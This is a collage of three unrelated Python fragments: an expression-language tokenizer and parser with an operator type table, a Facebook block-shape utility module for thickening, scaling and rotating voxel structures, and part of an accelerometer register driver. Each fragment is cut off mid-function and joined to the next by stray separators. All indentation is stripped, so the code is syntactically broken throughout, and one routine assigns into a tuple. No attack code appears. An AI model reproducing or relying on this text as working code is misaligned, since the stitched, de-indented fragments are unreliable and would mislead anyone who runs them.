function_table.add(Prototype("!=", (Real, Integer), Boolean))
function_table.add(Prototype("!=", (Integer, Real), Boolean))
function_table.add(Prototype("!=", (Boolean, Boolean), Boolean))
function_table.add(Prototype("!=", (Text, Text), Boolean))
function_table.add(Prototype("!=", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype("!=", (UUID, UUID), Boolean))
function_table.add(Prototype("<", (Long, Long), Boolean))
function_table.add(Prototype("<", (Long, Integer), Boolean))
function_table.add(Prototype("<", (Integer, Long), Boolean))
function_table.add(Prototype("<", (Integer, Integer), Boolean))
function_table.add(Prototype("<", (Real, Real), Boolean))
function_table.add(Prototype("<", (Real, Long), Boolean))
function_table.add(Prototype("<", (Long, Real), Boolean))
function_table.add(Prototype("<", (Real, Integer), Boolean))
function_table.add(Prototype("<", (Integer, Real), Boolean))
function_table.add(Prototype("<", (Text, Text), Boolean))
function_table.add(Prototype("<", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype(">", (Long, Long), Boolean))
function_table.add(Prototype(">", (Long, Integer), Boolean))
function_table.add(Prototype(">", (Integer, Long), Boolean))
function_table.add(Prototype(">", (Integer, Integer), Boolean))
function_table.add(Prototype(">", (Real, Real), Boolean))
function_table.add(Prototype(">", (Real, Long), Boolean))
function_table.add(Prototype(">", (Long, Real), Boolean))
function_table.add(Prototype(">", (Real, Integer), Boolean))
function_table.add(Prototype(">", (Integer, Real), Boolean))
function_table.add(Prototype(">", (Text, Text), Boolean))
function_table.add(Prototype(">", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype("<=", (Long, Long), Boolean))
function_table.add(Prototype("<=", (Long, Integer), Boolean))
function_table.add(Prototype("<=", (Integer, Long), Boolean))
function_table.add(Prototype("<=", (Integer, Integer), Boolean))
function_table.add(Prototype("<=", (Real, Real), Boolean))
function_table.add(Prototype("<=", (Real, Long), Boolean))
function_table.add(Prototype("<=", (Long, Real), Boolean))
function_table.add(Prototype("<=", (Real, Integer), Boolean))
function_table.add(Prototype("<=", (Integer, Real), Boolean))
function_table.add(Prototype("<=", (Text, Text), Boolean))
function_table.add(Prototype("<=", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype(">=", (Long, Long), Boolean))
function_table.add(Prototype(">=", (Long, Integer), Boolean))
function_table.add(Prototype(">=", (Integer, Long), Boolean))
function_table.add(Prototype(">=", (Integer, Integer), Boolean))
function_table.add(Prototype(">=", (Real, Real), Boolean))
function_table.add(Prototype(">=", (Real, Long), Boolean))
function_table.add(Prototype(">=", (Long, Real), Boolean))
function_table.add(Prototype(">=", (Real, Integer), Boolean))
function_table.add(Prototype(">=", (Integer, Real), Boolean))
function_table.add(Prototype(">=", (Text, Text), Boolean))
function_table.add(Prototype(">=", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype("~=", (Text, Text), Boolean))
function_table.add(Prototype("+", (Long,), Long))
function_table.add(Prototype("+", (Integer,), Integer))
function_table.add(Prototype("+", (Real,), Real))
function_table.add(Prototype("-", (Long,), Long))
function_table.add(Prototype("-", (Integer,), Integer))
function_table.add(Prototype("-", (Real,), Real))
function_table.add(Prototype("+", (Long, Long), Long))
function_table.add(Prototype("+", (Long, Integer), Long))
function_table.add(Prototype("+", (Integer, Long), Long))
function_table.add(Prototype("+", (Integer, Integer), Integer))
function_table.add(Prototype("+", (Real, Real), Real))
function_table.add(Prototype("+", (Real, Long), Real))
function_table.add(Prototype("+", (Long, Real), Real))
function_table.add(Prototype("+", (Real, Integer), Real))
function_table.add(Prototype("+", (Integer, Real), Real))
function_table.add(Prototype("-", (Long, Long), Long))
function_table.add(Prototype("-", (Long, Integer), Long))
function_table.add(Prototype("-", (Integer, Long), Long))
function_table.add(Prototype("-", (Integer, Integer), Integer))
function_table.add(Prototype("-", (Real, Real), Real))
function_table.add(Prototype("-", (Real, Long), Real))
function_table.add(Prototype("-", (Long, Real), Real))
function_table.add(Prototype("-", (Real, Integer), Real))
function_table.add(Prototype("-", (Integer, Real), Real))
function_table.add(Prototype("*", (Long, Long), Long))
function_table.add(Prototype("*", (Long, Integer), Long))
function_table.add(Prototype("*", (Integer, Long), Long))
function_table.add(Prototype("*", (Integer, Integer), Integer))
function_table.add(Prototype("*", (Real, Real), Real))
function_table.add(Prototype("*", (Real, Long), Real))
function_table.add(Prototype("*", (Long, Real), Real))
function_table.add(Prototype("*", (Real, Integer), Real))
function_table.add(Prototype("*", (Integer, Real), Real))
function_table.add(Prototype("/", (Long, Long), Long))
function_table.add(Prototype("/", (Long, Integer), Long))
function_table.add(Prototype("/", (Integer, Long), Long))
function_table.add(Prototype("/", (Integer, Integer), Integer))
function_table.add(Prototype("/", (Real, Real), Real))
function_table.add(Prototype("/", (Real, Long), Real))
function_table.add(Prototype("/", (Long, Real), Real))
function_table.add(Prototype("/", (Real, Integer), Real))
function_table.add(Prototype("/", (Integer, Real), Real))
function_table.add(Prototype("-", (Timestamp, Timestamp), Real))
#
# Functions.
#
function_table.add(Prototype("covers", (Geometry, Geometry), Boolean))
function_table.add(Prototype("covers", (Timestamp, Timestamp, Timestamp, Timestamp), Boolean))
function_table.add(Prototype("intersects", (Geometry, Geometry), Boolean))
function_table.add(Prototype("intersects", (Timestamp, Timestamp, Timestamp, Timestamp), Boolean))
function_table.add(Prototype("is_defined", (Long,), Boolean))
function_table.add(Prototype("is_defined", (Integer,), Boolean))
function_table.add(Prototype("is_defined", (Real,), Boolean))
function_table.add(Prototype("is_defined", (Boolean,), Boolean))
function_table.add(Prototype("is_defined", (Text,), Boolean))
function_table.add(Prototype("is_defined", (Timestamp,), Boolean))
function_table.add(Prototype("is_defined", (UUID,), Boolean))
function_table.add(Prototype("is_defined", (Geometry,), Boolean))
function_table.add(Prototype("is_source_of", (UUID,), Boolean))
function_table.add(Prototype("is_derived_from", (UUID,), Boolean))
function_table.add(Prototype("has_tag", (Text,), Boolean))
function_table.add(Prototype("now", (), Timestamp))
class TokenType(Enum):
_items = ("TEXT", "UUID", "TIMESTAMP", "REAL", "INTEGER", "BOOLEAN", "NAME", "OPERATOR", "END")
class Token(object):
def __init__(self, type_, value=None):
self.type_ = type_
self.value = value
def __repr__(self):
return "Token(type_ = TokenType.%s, value = %r)" % (TokenType.to_string(self.type_), self.value)
class TokenStream(object):
_sub_patterns = \
(
r"""\"(?:[^\\"]|\\.)*\"""", # Text literals
r"""\d{4}-\d{2}-\d{2}(?:T\d{2}:\d{2}:\d{2}(?:\.\d{0,6})?)?""", # Timestamp literals
r"""[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}""", # UUID literals
r"""\d+(?:\.\d*(?:[eE][+-]?\d+)?|[eE][+-]?\d+)""", # Real literals
r"""\d+""", # Integer literals
r"""true|false""", # Boolean literals
r"""[a-zA-Z]\w*""", # Names
r"""<=|>=|==|!=|~=|[*<>@(),.+-/]""" # Operators and delimiters
)
_pattern = r"""(?:%s)""" % ("|".join(["(%s)" % sub_pattern for sub_pattern in _sub_patterns]))
_re_token = re.compile(_pattern)
_re_datemin = re.compile("0000-00-00(?:T00:00:00(?:\.0{0,6})?)?$")
_re_datemax = re.compile("9999-99-99(?:T99:99:99(?:\.9{0,6})?)?$")
def __init__(self, text):
self.text = text
self.at_end = not self.text
self.token_start_position, self.token_end_position = 0, 0
self.next()
def next(self):
if self.at_end:
raise Error("char %d: unexpected end of input" % (self.token_start_position + 1))
self.token = self._next_token()
return self.token
def test(self, types, values=None):
return False if not self._test_token_types(types) else (values is None or self._test_token_values(values))
def accept(self, types, values=None):
if not self.test(types, values):
return False
self.next()
return True
def expect(self, types, values=None):
if not self.test(types, values):
if self.token.type_ == TokenType.END:
raise Error("char %d: unexpected end of input" % (self.token_start_position + 1))
else:
if self.token.value is None:
token_str = TokenType.to_string(self.token.type_)
else:
token_str = "\"%s\"" % self.token.value
expected_str = self._types_to_string(types) if values is None else self._values_to_string(values)
raise Error("char %d: expected %s, got %s" % (self.token_start_position + 1, expected_str, token_str))
token = self.token
self.next()
return token
def _types_to_string(self, types):
try:
strings = map(TokenType.to_string, types)
except TypeError:
return TokenType.to_string(types)
return "%s%s" % ("" if len(strings) == 1 else "one of: ", ", ".join(strings))
def _values_to_string(self, values):
if isinstance(values, basestring):
return "\"%s\"" % values
try:
strings = ["\"%s\"" % value for value in values]
except TypeError:
return "\"%s\"" % values
return "%s%s" % ("" if len(strings) == 1 else "one of: ", ", ".join(strings))
def _test_token_types(self, types):
try:
return self.token.type_ in types
except TypeError:
return self.token.type_ == types
def _test_token_values(self, values):
if isinstance(values, basestring):
return self.token.value == values
try:
return self.token.value in values
except TypeError:
return self.token.value == values
def _next_token(self):
self.token_start_position = self._skip_white_space(self.token_end_position)
if self.token_start_position == len(self.text):
self.at_end = True
return Token(TokenType.END)
match_object = self._re_token.match(self.text, self.token_start_position)
if match_object is None:
raise Error("char %d: syntax error: \"%s\"" % (self.token_start_position + 1,
self.text[self.token_start_position:]))
self.token_start_position, self.token_end_position = match_object.span()
text, timestamp, uuid_, real, integer, boolean, name, operator = match_object.groups()
if text is not None:
return Token(TokenType.TEXT, string_unescape(text[1:-1]))
if uuid_ is not None:
return Token(TokenType.UUID, uuid.UUID(uuid_))
if timestamp is not None:
return Token(TokenType.TIMESTAMP, self._parse_timestamp(timestamp))
if real is not None:
return Token(TokenType.REAL, float(real))
if integer is not None:
return Token(TokenType.INTEGER, int(integer))
if boolean is not None:
return Token(TokenType.BOOLEAN, boolean == "true")
if name is not None:
return Token(TokenType.NAME, name)
if operator is not None:
return Token(TokenType.OPERATOR, operator)
raise Error("char %d: syntax error: \"%s\"" % (self.token_start_position + 1, match_object.group()))
def _skip_white_space(self, start):
while start < len(self.text) and self.text[start].isspace():
start += 1
return start
def _parse_timestamp(self, timestamp):
if self._re_datemin.match(timestamp) is not None:
return datetime.datetime.min
if self._re_datemax.match(timestamp) is not None:
return datetime.datetime.max
for format_string in ("%Y-%m-%d", "%Y-%m-%dT%H:%M:%S", "%Y-%m-%dT%H:%M:%S.%f"):
try:
return datetime.datetime.strptime(timestamp, format_string)
except ValueError:
pass
raise Error("char %d: invalid timestamp: \"%s\"" % (self.token_start_position + 1, timestamp))
class AbstractSyntaxTreeNode(object):
pass
class Literal(AbstractSyntaxTreeNode):
def __init__(self, value):
self.value = value
def __str__(self):
return "(%s %s)" % (type(self).__name__, self.value)
class Name(AbstractSyntaxTreeNode):
def __init__(self, value):
self.value = value
def __str__(self):
return "(%s %s)" % (type(self).__name__, self.value)
class ParameterReference(AbstractSyntaxTreeNode):
def __init__(self, name):
self.name = name
def __str__(self):
return "(%s %s)" % (type(self).__name__, self.name)
class FunctionCall(AbstractSyntaxTreeNode):
def __init__(self, name, *args):
self.name = name
self.arguments = list(args)
def __str__(self):
if not self.arguments:
return "(%s %s)" % (type(self).__name__, self.name)
return "(%s %s %s)" % (type(self).__name__, self.name, " ".join(map(str, self.arguments)))
def parse_sequence(stream, parse_item_function):
stream.expect(TokenType.OPERATOR, "(")
if stream.accept(TokenType.OPERATOR, ")"):
return []
sequence = [parse_item_function(stream)]
while stream.accept(TokenType.OPERATOR, ","):
sequence.append(parse_item_function(stream))
stream.expect(TokenType.OPERATOR, ")")
return sequence
def parse_geometry_sequence(stream, parse_item_function):
if stream.accept(TokenType.NAME, "EMPTY"):
return []
stream.expect(TokenType.OPERATOR, "(")
sequence = [parse_item_function(stream)]
while stream.accept(TokenType.OPERATOR, ","):
sequence.append(parse_item_function(stream))
stream.expect(TokenType.OPERATOR, ")")
return sequence
def parse_signed_coordinate(stream):
if stream.accept(TokenType.OPERATOR, "-"):
token = stream.expect((TokenType.INTEGER, TokenType.REAL))
return -float(token.value)
stream.accept(TokenType.OPERATOR, "+")
token = stream.expect((TokenType.INTEGER, TokenType.REAL))
return float(token.value)
def parse_point_raw(stream):
return geometry.Point(parse_signed_coordinate(stream),
parse_signed_coordinate(stream))
def parse_point(stream):
stream.expect(TokenType.OPERATOR, "(")
point = parse_point_raw(stream)
stream.expect(TokenType.OPERATOR, ")")
return point
def parse_line_string(stream):
return geometry.LineString(parse_geometry_sequence(stream, parse_point_raw))
def parse_linear_ring(stream):
points = parse_geometry_sequence(stream, parse_point_raw)
if len(points) == 0:
return geometry.LinearRing()
if len(points) < 4:
raise Error("char %d: linear ring should be empty or should contain >= 4 points" % stream.token_start_position)
if points[-1] != points[0]:
raise Error("char %d: linear ring should be closed" % stream.token_start_position)
return geometry.LinearRing(points[:-1])
def parse_polygon(stream):
return geometry.Polygon(parse_geometry_sequence(stream, parse_linear_ring))
def parse_multi_point(stream):
return geometry.MultiPoint(parse_geometry_sequence(stream, parse_point))
def parse_multi_line_string(stream):
return geometry.MultiLineString(parse_geometry_sequence(stream, parse_line_string))
def parse_multi_polygon(stream):
return geometry.MultiPolygon(parse_geometry_sequence(stream, parse_polygon))
def parse_atom(stream):
# Sub-expression.
if stream.accept(TokenType.OPERATOR, "("):
sub_expression = parse_expression(stream)
stream.expect(TokenType.OPERATOR, ")")
return sub_expression
# Parameter reference.
if stream.accept(TokenType.OPERATOR, "@"):
name_token = stream.expect(TokenType.NAME)
return ParameterReference(name_token.value)
# Geometry literal, function call, or name.
if stream.test(TokenType.NAME):
name_token = stream.expect(TokenType.NAME)
# Geometry literals.
if name_token.value == "POINT":
return Literal(parse_point(stream))
elif name_token.value == "LINESTRING":
return Literal(parse_line_string(stream))
elif name_token.value == "POLYGON":
return Literal(parse_polygon(stream))
elif name_token.value == "MULTIPOINT":
return Literal(parse_multi_point(stream))
elif name_token.value == "MULTILINESTRING":
return Literal(parse_multi_line_string(stream))
elif name_token.value == "MULTIPOLYGON":
return Literal(parse_multi_polygon(stream))
# Function call.
if stream.test(TokenType.OPERATOR, "("):
return FunctionCall(name_token.value, *parse_sequence(stream, parse_expression))
# Name (possibly qualified).
parts = [name_token.value]
while stream.accept(TokenType.OPERATOR, "."):
name_token = stream.expect(TokenType.NAME)
parts.append(name_token.value)
return Name(".".join(parts))
# Literal.
token = stream.expect((TokenType.TEXT, TokenType.TIMESTAMP, TokenType.UUID, TokenType.REAL, TokenType.INTEGER,
TokenType.BOOLEAN))
return Literal(token.value)
def parse_term(stream):
if stream.test(TokenType.OPERATOR, ("+", "-")):
operator_token = stream.expect(TokenType.OPERATOR, ("+", | |
"""
Copyright (c) Facebook, Inc. and its affiliates.
"""
import numpy as np
from collections import Counter
from build_utils import blocks_list_to_npy # , npy_to_blocks_list
##############################################
# WARNING: all npy arrays in this file are xyz
# not yzx
def maybe_convert_to_npy(blocks):
"""Convert a list of blocks to numpy array"""
if type(blocks) is list:
blocks, _ = blocks_list_to_npy(blocks, xyz=True)
return blocks
else:
assert blocks.shape[-1] == 2
assert len(blocks.shape) == 4
return blocks.copy()
def maybe_convert_to_list(blocks):
"""Convert blocks to a list"""
if type(blocks) is list:
return blocks.copy()
else:
nz = np.transpose(blocks[:, :, :, 0].nonzero())
return [(tuple(loc), tuple(blocks[tuple(loc)])) for loc in nz]
def flint(x):
return int(np.floor(x))
def ceint(x):
return int(np.ceil(x))
def check_boundary(p, m, M):
if (
p[0] == m[0]
or p[0] == M[0] - 1
or p[1] == m[1]
or p[1] == M[1] - 1
or p[2] == m[2]
or p[2] == M[2] - 1
):
return True
else:
return False
def reshift(shape):
m = np.min([l[0] for l in shape], axis=0)
return [((b[0][0] - m[0], b[0][1] - m[1], b[0][2] - m[2]), b[1]) for b in shape]
def moment_at_center(npy, sl):
"""
shifts the object in the 4d numpy array so that the center of mass is at sl//2
in a sl x sl x sl x 2 array
warning, this will cut anything that is too big to fit in sl x sl x sl
and then the moment might not actually be in center.
"""
nz = np.transpose(npy[:, :, :, 0].nonzero())
mins = np.min(nz, axis=0)
shifted_nz = nz - mins
com = np.floor(np.array(shifted_nz.mean(axis=0)))
# this will fail if com is bigger than sl.
assert all(com < sl)
npy_out_center = np.array((sl // 2, sl // 2, sl // 2))
shifted_nz = (shifted_nz - com + npy_out_center).astype("int32")
npy_out = np.zeros((sl, sl, sl, 2), dtype="int32")
for i in range(nz.shape[0]):
if all(shifted_nz[i] >= 0) and all(shifted_nz[i] - sl < 0):
npy_out[tuple(shifted_nz[i])] = npy[tuple(nz[i])]
return npy_out
#############################################
## THICKEN
#############################################
# this doesn't preserve corners. should it?
# separate deltas per dim?
def thicker_blocks(blocks, delta=1):
"""Takes a list of blocks and thickens them
by an amount equal to delta"""
newblocks = {l: idm for (l, idm) in blocks}
for b in blocks:
for dx in range(-delta, delta + 1):
for dy in range(-delta, delta + 1):
for dz in range(-delta, delta + 1):
l = b[0]
newblocks[(l[0] + dx, l[1] + dy, l[2] + dz)] = b[1]
return list(newblocks.items())
def thicker(blocks, delta=1):
"""
Returns:
numpy array of blocks thickened with an amount delta
"""
blocks = maybe_convert_to_list(blocks)
newblocks = thicker_blocks(blocks, delta=delta)
npy, _ = blocks_list_to_npy(newblocks, xyz=True)
return npy
#############################################
## SCALE
#############################################
def get_loc_weight(idx, cell_size):
""" compute the scaled indices and amount in 1d they
extend on either side of the block boundary
"""
left = idx * cell_size
right = (idx + 1) * cell_size
lidx = int(np.floor(left))
ridx = int(np.floor(right))
if ridx > lidx:
right_weight = right - ridx
left_weight = ridx - left
else:
right_weight = 0
left_weight = 1
return (lidx, ridx), (left_weight, right_weight)
def get_cell_weights(idxs, cell_szs):
""" compute the amount of the cell in each of
the 8 cubes it might touch """
index = []
dw = []
for k in range(3):
i, w = get_loc_weight(idxs[k], cell_szs[k])
index.append(i)
dw.append(w)
cell_weights = np.zeros((2, 2, 2))
best_cell = None
big_weight = 0.0
total_weight = 0.0
for i in range(2):
for j in range(2):
for k in range(2):
w = dw[0][i] * dw[1][j] * dw[2][k]
cell_weights[i, j, k] = w
total_weight += w
if w > big_weight:
big_weight = w
best_cell = (index[0][i], index[1][j], index[2][k])
cell_weights = cell_weights / total_weight
return best_cell, index, cell_weights
def scale(blocks, lams=(1.0, 1.0, 1.0)):
""" scales the blockobject in the ith direction with factor lams[i]
algorithm is to first scale the blocks up (so each minecraft cube has
size lams), and then for each 1x1x1 block arranged in place assign it
the id, meta of the big block it most intersects
"""
assert lams[0] >= 1.0 # eventually FIXME?
assert lams[1] >= 1.0 # eventually FIXME?
assert lams[2] >= 1.0 # eventually FIXME?
inp = maybe_convert_to_npy(blocks)
szs = np.array(inp.shape[:3])
big_szs = np.ceil(szs * lams)
cell_szs = szs / big_szs
big_szs = big_szs.astype("int32")
big = np.zeros(tuple(big_szs) + (2,)).astype("int32")
for i in range(big_szs[0]):
for j in range(big_szs[1]):
for k in range(big_szs[2]):
best_cell, _, _ = get_cell_weights((i, j, k), cell_szs)
big[i, j, k, :] = inp[best_cell]
return big
def scale_sparse(blocks, lams=(1.0, 1.0, 1.0)):
""" scales the blockobject in the ith direction with factor lams[i]
algorithm is to first scale the blocks up (so each minecraft cube has
size lams), and then for each 1x1x1 block arranged in place assign it
the id, meta of the big block it most intersects
"""
assert lams[0] >= 1.0 # eventually FIXME?
assert lams[1] >= 1.0 # eventually FIXME?
assert lams[2] >= 1.0 # eventually FIXME?
inp = maybe_convert_to_list(blocks)
locs = [l for (l, idm) in inp]
m = np.min(locs, axis=0)
inp_dict = {(l[0] - m[0], l[1] - m[1], l[2] - m[2]): idm for (l, idm) in inp}
szs = np.max(locs, axis=0) - np.min(locs, axis=0) + 1
big_szs = np.ceil(szs * lams)
cell_szs = szs / big_szs
big_szs = big_szs.astype("int32")
big = np.zeros(tuple(big_szs) + (2,)).astype("int32")
for (x, y, z) in inp_dict.keys():
for i in range(flint(x * lams[0]), ceint(x * lams[0]) + 2):
for j in range(flint(y * lams[1]), ceint(y * lams[1]) + 2):
for k in range(flint(z * lams[2]), ceint(z * lams[2]) + 2):
if i < big_szs[0] and j < big_szs[1] and k < big_szs[2]:
best_cell, _, _ = get_cell_weights((i, j, k), cell_szs)
idm = inp_dict.get(best_cell)
if idm:
big[i, j, k, :] = idm
else:
big[i, j, k, :] = (0, 0)
return big
def shrink_sample(blocks, lams):
"""Shrink the blocks with dimensions in lams"""
assert lams[0] <= 1.0
assert lams[1] <= 1.0
assert lams[2] <= 1.0
blocks = maybe_convert_to_npy(blocks)
szs = blocks.shape
xs = np.floor(np.arange(0, szs[0], 1 / lams[0])).astype("int32")
ys = np.floor(np.arange(0, szs[1], 1 / lams[1])).astype("int32")
zs = np.floor(np.arange(0, szs[2], 1 / lams[2])).astype("int32")
small = np.zeros((len(xs), len(ys), len(zs), 2), dtype="int32")
for i in range(len(xs)):
for j in range(len(ys)):
for k in range(len(zs)):
small[i, j, k] = blocks[xs[i], ys[j], zs[k]]
return small
#############################################
## ROTATE
#############################################
def rotate(blocks, angle=0, mirror=-1, plane="xz"):
"""Rotate a list of blocks by an angle 'angle' along
the plane given by 'plane'.
If 'mirror' is > 0, a mirror image of the blocks is returned
Returns:
A rotated list of blocks
"""
inp = maybe_convert_to_npy(blocks)
if mirror > 0:
inp = np.flip(inp, mirror)
# maybe generalize?
assert angle % 90 == 0
i = angle // 90
if i < 0:
i = i % 4
if plane == "xz" or plane == "zx":
return np.rot90(inp, i, axes=(0, 2))
elif plane == "xy" or plane == "yx":
return np.rot90(inp, i, axes=(0, 1))
else:
return np.rot90(inp, i, axes=(1, 2))
#############################################
## REPLACE
#############################################
def hash_idm(npy):
return npy[:, :, :, 0] + 1000 * npy[:, :, :, 1]
def unhash_idm(npy):
npy = npy.astype("int32")
b = npy % 1000
m = (npy - b) // 1000
return np.stack((b, m), axis=3)
# TODO current_idm should be a list
def replace_by_blocktype(blocks, new_idm=(0, 0), current_idm=None, every_n=1, replace_every=False):
"""replace some blocks with a different kind
note that it is allowed that new_idm is (0,0)
"""
if current_idm is not None: # specifying a transformation of one blocktype to another
blocks = maybe_convert_to_npy(blocks)
h = hash_idm(blocks)
u = h.copy()
old_idm_hash = current_idm[0] + 1000 * current_idm[1]
new_idm_hash = new_idm[0] + 1000 * new_idm[1]
u[u == old_idm_hash] = new_idm_hash
out = unhash_idm(u)
else: # TODO FIXME need better algorithm here
if every_n == 1 and not replace_every:
lblocks = maybe_convert_to_list(blocks)
mode = Counter([idm for loc, idm in lblocks]).most_common(1)[0][0]
for b in lblocks:
if b[1] == mode:
b[1] = new_idm
return maybe_convert_to_npy(lblocks)
blocks = maybe_convert_to_npy(blocks)
out = blocks.copy()
if type(every_n) is int:
every_n = (every_n, every_n, every_n)
nzmask = blocks[:, :, :, 0] > 0
every_n_mask = nzmask.copy()
every_n_mask[:] = False
every_n_mask[:: every_n[0], :: every_n[0], :: every_n[0]] = True
mask = np.logical_and(every_n_mask, nzmask)
out_b = out[:, :, :, 0]
out_b[mask] = new_idm[0]
out_m | |
| (bw << 6)
#print(value)
self.write_reg(self.REG_CTRL_REG6,value)
'''
@brief Set power mode
@param mode 16 power modes to choose from
HIGH_PERFORMANCE_14BIT #High-Performance Mode
CONT_LOWPWR4_14BIT #Continuous measurement,Low-Power Mode 4(14-bit resolution)
CONT_LOWPWR3_14BIT #Continuous measurement,Low-Power Mode 3(14-bit resolution)
CONT_LOWPWR2_14BIT #Continuous measurement,Low-Power Mode 2(14-bit resolution)
CONT_LOWPWR1_12BIT #Continuous measurement,Low-Power Mode 1(12-bit resolution)
SING_LELOWPWR4_14BIT #Single data conversion on demand mode,Low-Power Mode 4(14-bit resolution)
SING_LELOWPWR3_14BIT #Single data conversion on demand mode,Low-Power Mode 3(14-bit resolution
SING_LELOWPWR2_14BIT #Single data conversion on demand mode,Low-Power Mode 2(14-bit resolution)
SING_LELOWPWR1_12BIT #Single data conversion on demand mode,Low-Power Mode 1(12-bit resolution)
HIGHP_ERFORMANCELOW_NOISE_14BIT #High-Performance Mode,Low-noise enabled
CONT_LOWPWRLOWNOISE4_14BIT #Continuous measurement,Low-Power Mode 4(14-bit resolution,Low-noise enabled)
CONT_LOWPWRLOWNOISE3_14BIT #Continuous measurement,Low-Power Mode 3(14-bit resolution,Low-noise enabled)
CONT_LOWPWRLOWNOISE2_14BIT #Continuous measurement,Low-Power Mode 2(14-bit resolution,Low-noise enabled)
CONT_LOWPWRLOWNOISE1_12BIT #Continuous measurement,Low-Power Mode 1(14-bit resolution,Low-noise enabled)
SINGLE_LOWPWRLOWNOISE4_14BIT #Single data conversion on demand mode,Low-Power Mode 4(14-bit resolution),Low-noise enabled
SINGLE_LOWPWRLOWNOISE3_14BIT #Single data conversion on demand mode,Low-Power Mode 3(14-bit resolution),Low-noise enabled
SINGLE_LOWPWRLOWNOISE2_14BIT #Single data conversion on demand mode,Low-Power Mode 2(14-bit resolution),Low-noise enabled
SINGLE_LOWPWRLOWNOISE1_12BIT #Single data conversion on demand mode,Low-Power Mode 1(12-bit resolution),Low-noise enabled
'''
def set_power_mode(self,mode):
value = self.read_reg(self.REG_CTRL_REG1)
value = value & (~0x0f)
value = value | (mode & 0xf)
self.write_reg(self.REG_CTRL_REG1,value)
#print("set_power_mode")
#print(value)
value = self.read_reg(self.REG_CTRL_REG6)
enable = mode >> 4
value = value & (~(1 << 2))
value = value | (enable << 2)
#print(value)
self.write_reg(self.REG_CTRL_REG6,value)
'''
@brief Set data measurement rate
@param rate rate
RATE_OFF #Measurement off
RATE_1HZ6 #1.6hz, use only under low-power mode
RATE_12HZ5 #12.5hz
RATE_25HZ
RATE_50HZ
RATE_100HZ
RATE_200HZ
RATE_400HZ #Use only under High-Performance mode
RATE_800HZ #Use only under High-Performance mode
RATE_1600HZ #Use only under High-Performance mode
SETSWTRIG #The software triggers a single measurement
'''
def set_data_rate(self, rate):
value = self.read_reg(self.REG_CTRL_REG1)
value = value & (~(0xf << 4))
value = value | (rate << 4)
#print("set_data_rate")
#print(value)
self.write_reg(self.REG_CTRL_REG1,value)
value = self.read_reg(self.REG_CTRL_REG3)
enable = (rate&0x30) >> 4
value = value & (~3)
value = value | enable
#print(value)
self.write_reg(self.REG_CTRL_REG3,value)
'''
@brief Set the free fall time, or the numbers of free-fall samples. In a measurement, it will not be determined as a free fall event unless the samples are enough.
@param dur duration, range:0~31
@n time = dur * (1/rate)(unit:s)
| An example of a linear relationship between an argument and time |
|------------------------------------------------------------------------------------------------------------------------|
| | | | | |
| Data rate | 25 Hz | 100 Hz | 400 Hz | = 800 Hz |
|------------------------------------------------------------------------------------------------------------------------|
| time |dur*(1s/25)= dur*40ms| dur*(1s/100)= dur*10ms | dur*(1s/400)= dur*2.5ms | dur*(1s/800)= dur*1.25ms |
|------------------------------------------------------------------------------------------------------------------------|
'''
def set_free_fall_Dur(self,dur):
value1 = self.read_reg(self.REG_WAKE_UP_DUR)
value2 = self.read_reg(self.REG_FREE_FALL)
value1 = value1 & (~0x80)
value2 = value2 & (~0xf8)
value2 = value2 | (dur << 3)
#print(value1)
self.write_reg(self.REG_WAKE_UP_DUR,value1)
#print(value2)
self.write_reg(self.REG_FREE_FALL,value2)
self.__set_ff_threshold(3)
'''
@brief Set Free-fall threshold
@param th threshold
'''
def __set_ff_threshold(self,th):
value = self.read_reg(self.REG_FREE_FALL)
value = value & (~0x07)
value = value | (th & 0x07)
#print(value)
self.write_reg(self.REG_FREE_FALL,value)
'''
@brief Set the interrupt source of the int1 pin
@param event Several interrupt events, after setting, when an event is generated, a level transition will be generated on the int1 pin
DOUBLE_TAP #Double tap event
FREEFALL #Freefall event
WAKEUP #Wake-up event
SINGLE_TAP #Single tap event
IA6D #An event changed the status of facing up/down/left/right/forward/back
'''
def set_int1_event(self,event):
value1 = self.read_reg(self.REG_CTRL_REG4)
value2 = self.read_reg(self.REG_CTRL_REG5)
value3 = self.read_reg(self.REG_CTRL_REG7)
value3 = value3 & (~0x20)
value3 = value3 | 0x20
value1 = value1 | event
self.write_reg(self.REG_CTRL_REG4,value1)
self.write_reg(self.REG_CTRL_REG7,value3)
if event == self.FREEFALL:
self.__lock_interrupt(True)
'''
@brief Set wake-up duration, when using the detection mode of eDetectAct in the setActMode() function, it will be a period of time to collect
@n data at a normal rate after the chip is awakened. Then the chip will continue to hibernate, collecting data at a frequency of 12.5hz.
@param dur duration, range: 0~3
@n time = dur * (1/rate)(unit:s)
| An example of a linear relationship between an argument and time |
|------------------------------------------------------------------------------------------------------------------------|
| | | | | |
| Data rate | 25 Hz | 100 Hz | 400 Hz | = 800 Hz |
|------------------------------------------------------------------------------------------------------------------------|
| time |dur*(1s/25)= dur*40ms| dur*(1s/100)= dur*10ms | dur*(1s/400)= dur*2.5ms | dur*(1s/800)= dur*1.25ms |
|------------------------------------------------------------------------------------------------------------------------|
'''
def set_wakeup_dur(self,dur):
value = self.read_reg(self.REG_WAKE_UP_DUR)
value = value & (~0x60)
value = value | ((dur << 5) & 0x60)
#print(value)
self.write_reg(self.REG_WAKE_UP_DUR,value)
'''
@brief Set the mode of motion detection, the first mode will not detect whether the module is moving; the second, once set, will measure
@n data at a lower frequency to save consumption, and return to normal after detecting motion; the third can only detect whether the
@n module is in sleep state.
@param mode Motion detection mode
NO_DETECTION #No detection
DETECT_ACT #Detect movement,the chip automatically goes to 12.5 Hz rate in the low-power mode
DETECT_STATMOTION #Detect Motion, the chip detects acceleration below a fixed threshold but does not change either rate or operating mode
'''
def set_act_mode(self,mode):
value1 = self.read_reg(self.REG_WAKE_UP_THS)
value2 = self.read_reg(self.REG_WAKE_UP_DUR)
value1 = value1 & (~(1<<6))
value2 = value2 & (~(1<<4))
value1 = value1 | (mode & 0x01)<<6
value2 = value2 | ((mode & 0x02)>>1)<<4
#print(value1)
#print(value2)
self.write_reg(self.REG_WAKE_UP_THS,value1)
self.write_reg(self.REG_WAKE_UP_DUR,value2)
'''
@brief Set the wake-up threshold, when the acceleration in a certain direction is greater than this value, a wake-up event will be triggered
@param th threshold ,unit:mg, the value is within the measurement range
'''
def set_wakeup_threshold(self,th):
